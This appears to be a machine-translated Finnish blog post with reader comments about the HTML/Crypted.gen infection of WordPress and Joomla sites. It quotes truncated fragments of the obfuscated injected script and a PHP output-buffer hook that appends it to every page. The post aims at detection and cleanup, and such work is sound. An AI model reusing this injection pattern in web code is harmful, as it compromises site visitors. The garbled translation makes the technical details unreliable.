HTML / Crypted.gen iskujen WordPress ja Joomla
Mielenkiintoinen selitys hyökkäyksen tehnyt imaginepaolo http://www.settorezero.com/ :
Se tapahtuu useammin tapahtumat, että monet sivustot perustuu WordPress ja Joomla ovat hyökänneet tavalla tai Troijan raportoitu Avira HTML / Crypted.gen. Tiedä, jos tämä on ongelma vikoja näissä kahdessa julkaisujärjestelmät (mutta epäilen sitä) tai pikemminkin siltä, että virus hyökkäsi palvelimet että vastaanottavan tällaisia sivustoja.
Jälkimmäisessä tapauksessa olin tukee se, että kaikki ihmiset otin yhteyttä ja joka on ollut sama ongelma, kaikki ovat isännöi samana mukaan. Sit vielä maksut nyt, koska se on hieman poikkeava ja verkostoitumista enkä ole löytänyt riittävästi tietoa, jotta oletus voimassa, joten minun on vain arvauksia ja otettava sellaisenaan.
Samaan aikaan toivon, että tämä viesti voi olla hyödyllistä ja keskustellaan ymmärtää, missä ongelma on peräisin.
Ensinnäkin on sanottava, että virus muuttaa sivuja (mutta ei aina kaikille sivuille), joiden tunniste html, php, asp ja JS lisäämällä salattu javascript-koodin, joka alkaa enemmän tai vähemmän kuin tämä:
"javascript" > $a = \ "Z64dZ3dZ22q|se|qdu]qwys^e}rub8tqiZ3c0} <script Kieli = "javascript"> $ = \ "Z64dZ3dZ22q | jos | qdu] qwys rub8tqiZ3c0 ^ e))Sanon "enemmän tai vähemmän", koska kaikki eivät näyttää samalta, mutta se on helppo tunnistaa haitallisen koodin, koska näemme, on hieman himmentää: avainsanat eivät ole lukenut, mutta vain sarjoissa merkkiä näennäisesti järjetöntä.
Suhteellisen WordPress kuitenkin haitallisen koodin yleensä lisätään jokaiselle sivulle "index.php" ja alkaa näin:
1 ( "security_update" ) ; function security_update ( $buffer ) { return $buffer . "<script language= \" javascript \" > $a = \" Z64dZ3dZ22q|se|qdu]qwys^e} <? Php ob_start (security_update ")-toiminnon security_update ($ puskuri) (return $ puskuri." <script Language= \" javascript \"> $ = \ "Z64dZ3dZ22q | jos | qdu] qwys ^ e)Näyttää siltä, että kirjoitus ei aiheuttaa vahinkoa ja todetaan vain Avira (nopea). Ongelma on ratkaistu poistamalla komentosarjan sivuilta haitallisiksi tai maksujen normaali kopio sivujen palvelimelle.
Jotkut käyttäjät kuitenkin saatuaan virus, se löytyy kopio sivuston (tai muu www-sivut) tallennetaan tietokoneeseen tämän ongelman, niin hyökkäys näyttää "paikallisia" eikä etäinen: sivut näyttävät kimppuun samassa tietokoneessa, jossa he asuvat. Tämä saa minut ajattelemaan yhä enemmän se hosting ongelma: itse asiassa monet ovat heidän PC ja kopio tartuntalähde, kun palvelin on kuitenkin esitettävä tämä kirjoitus sivua.
Ratkaisu voisi viedä on aina ajankohtainen varmuuskopio sinun sivustoon tietokoneella ja tilata enintään verkkosivuilla, kun ei ole toimitettu.
Lainaan tässä muutamia hyödyllisiä linkkejä (enimmäkseen wordpress) liittyvä ongelma edellä:
http://codex.wordpress.org/FAQ_My_site_was_hacked
Related Posts
Mainos










[...] UHKIEN Bland - Näyttää siltä, että on uhka lähes heti löytänyt vain Avira (ja [...]
Minulle tapahtui kaksi kertaa 20 päivää. :-D
Se tapahtui minulle samanlainen hyökkäys (ei voi muistaa, jos koodi on sama) viime vuoden marraskuussa.
Löysin ja poistaa haitallisen koodin kanssa ampua Antivirus WordPress. Olen kuitenkin tehnyt, mitä olin lukenut oli parasta tehdä: I asentanut kaiken teema plugins, olen myös vaihtanut url ja salasana. Sen jälkeen, ja nyt kaikki on hyvin ... mutta minä sanon hiljaa.
Hei!
Yritän etsiä koodia, että olet antanut, mutta silti ei mitään. Latasin kaikki blogini paitsi Julkinen kansio ja mdb-tietokannasta.

[...] Hei haloo Turbo Kannattaa siis Joomla foorumi, toiset on sama ongelma. HTML / Crypted.gen iskujen WordPress ja Joomla | Web Design [Vastattu + kysymys] html / crypted.gen HTML / Crypted.gen iskujen WordPress ja Joomla | Teollisuus [...]
Kiitos!
Olen ratkaissut ongelman poistamalla kirjoitus.
Nimettiin indeksi kaikki sivut, vaikka ne index_1. index_old kopioita vanhoista muutoksista.
Kiitos vielä kerran ... Olen velkaa sinulle hyväksi
Hei,
sama tapahtui minulle, ei ole ensimmäinen kerta Aruba (toimittaja), mutta se tapahtui 7 tai 8 kertaa alkaa ajatella, että tällaiset hyökkäykset, joiden tarkoituksena myydä antivirus palvelu on vapaaehtoinen ja maksaa: Tietenkin Toimittaja muuttaa valon nopeudella.
Omat epäilykset melko kohtuullisia, myös siitä, että edellinen hyökkäys minä vain aktiivisia plugins (kaikki "sertifioitu" ja ladata wp.org) ja rakensin mallin yksin ... tässä vaiheessa, koska Ongelma on aina vain kuuluvat alueet isännöi Aruba Minulla on täysi syy epäillä kesä ... liian huono, mutta jos voin viikonloppuna ostan toisen hosting. jos olet ehdotukset ovat tervetulleita
En usko, että tämä haavoittuvuus WordPress, olen versio 2.9.2, joka oli hyvä pitkään ja on vakaa (itse asiassa en päivitä 3 pelossa iskut)